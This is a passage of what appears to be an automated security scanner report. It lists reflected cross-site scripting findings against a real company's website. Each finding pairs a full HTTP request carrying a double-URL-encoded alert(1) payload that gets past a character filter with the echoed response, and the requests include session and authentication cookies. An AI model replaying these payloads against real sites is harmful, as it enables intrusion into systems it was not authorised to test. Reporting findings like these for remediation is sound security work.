Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:28 GMT
Content-Length: 28940
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib8e093";alert(1)//546f4c6ebec/logos/small-signup-icon","E404") ;
   </script>
...[SNIP]...

1.419. http://www.sigmaaldrich.com/etc/medialib/logos/small-signup-icon [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/logos/small-signup-icon

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3be25%2522%253balert%25281%2529%252f%252f85c48fd9f87 was submitted in the REST URL parameter 3. This input was echoed as 3be25";alert(1)//85c48fd9f87 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/logos3be25%2522%253balert%25281%2529%252f%252f85c48fd9f87/small-signup-icon HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:30 GMT
Content-Length: 28940
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/logos3be25";alert(1)//85c48fd9f87/small-signup-icon","E404") ;
   </script>
...[SNIP]...

1.420. http://www.sigmaaldrich.com/etc/medialib/logos/small-signup-icon [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/logos/small-signup-icon

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8a45%2522%253balert%25281%2529%252f%252fa7745df03c1 was submitted in the REST URL parameter 4. This input was echoed as f8a45";alert(1)//a7745df03c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/logos/small-signup-iconf8a45%2522%253balert%25281%2529%252f%252fa7745df03c1 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:32 GMT
Content-Length: 28940
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/logos/small-signup-iconf8a45";alert(1)//a7745df03c1","E404") ;
   </script>
...[SNIP]...

1.421. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/headers/endeca-search-and/baynotejs.Par.0001.File.tmp/baynote.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/headers/endeca-search-and/baynotejs.Par.0001.File.tmp/baynote.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4d97%2522%253balert%25281%2529%252f%252f5ac7019904a was submitted in the REST URL parameter 1. This input was echoed as b4d97";alert(1)//5ac7019904a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etcb4d97%2522%253balert%25281%2529%252f%252f5ac7019904a/medialib/sigma-aldrich/headers/endeca-search-and/baynotejs.Par.0001.File.tmp/baynote.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/united-states.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; fsr.a=1289930574273; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"}}

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:06 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28995


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etcb4d97";alert(1)//5ac7019904a/medialib/sigma-aldrich/headers/endeca-search-and/baynotejs.Par.0001.File.tmp/baynote.js","E404") ;
   </script>
...[SNIP]...

1.422. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/headers/endeca-search-and/baynotejs.Par.0001.File.tmp/baynote.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/headers/endeca-search-and/baynotejs.Par.0001.File.tmp/baynote.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90855%2522%253balert%25281%2529%252f%252f20f8e447cc7 was submitted in the REST URL parameter 2. This input was echoed as 90855";alert(1)//20f8e447cc7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib90855%2522%253balert%25281%2529%252f%252f20f8e447cc7/sigma-aldrich/headers/endeca-search-and/baynotejs.Par.0001.File.tmp/baynote.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/united-states.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; fsr.a=1289930574273; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"}}

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:09 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28995


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib90855";alert(1)//20f8e447cc7/sigma-aldrich/headers/endeca-search-and/baynotejs.Par.0001.File.tmp/baynote.js","E404") ;
   </script>
...[SNIP]...

1.423. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/headers/endeca-search-and/baynotejs.Par.0001.File.tmp/baynote.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/headers/endeca-search-and/baynotejs.Par.0001.File.tmp/baynote.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4c49%2522%253balert%25281%2529%252f%252ff91d1bd5537 was submitted in the REST URL parameter 3. This input was echoed as d4c49";alert(1)//f91d1bd5537 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrichd4c49%2522%253balert%25281%2529%252f%252ff91d1bd5537/headers/endeca-search-and/baynotejs.Par.0001.File.tmp/baynote.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/united-states.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; fsr.a=1289930574273; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"}}

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:11 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28995


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrichd4c49";alert(1)//f91d1bd5537/headers/endeca-search-and/baynotejs.Par.0001.File.tmp/baynote.js","E404") ;
   </script>
...[SNIP]...

1.424. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/headers/endeca-search-and/baynotejs.Par.0001.File.tmp/baynote.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/headers/endeca-search-and/baynotejs.Par.0001.File.tmp/baynote.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac03a%2522%253balert%25281%2529%252f%252f25e2bed661d was submitted in the REST URL parameter 4. This input was echoed as ac03a";alert(1)//25e2bed661d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/headersac03a%2522%253balert%25281%2529%252f%252f25e2bed661d/endeca-search-and/baynotejs.Par.0001.File.tmp/baynote.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/united-states.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; fsr.a=1289930574273; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"}}

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:15 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28995


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/headersac03a";alert(1)//25e2bed661d/endeca-search-and/baynotejs.Par.0001.File.tmp/baynote.js","E404") ;
   </script>
...[SNIP]...

1.425. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/headers/endeca-search-and/baynotejs.Par.0001.File.tmp/baynote.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/headers/endeca-search-and/baynotejs.Par.0001.File.tmp/baynote.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df246%2522%253balert%25281%2529%252f%252f46ecedfb122 was submitted in the REST URL parameter 5. This input was echoed as df246";alert(1)//46ecedfb122 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

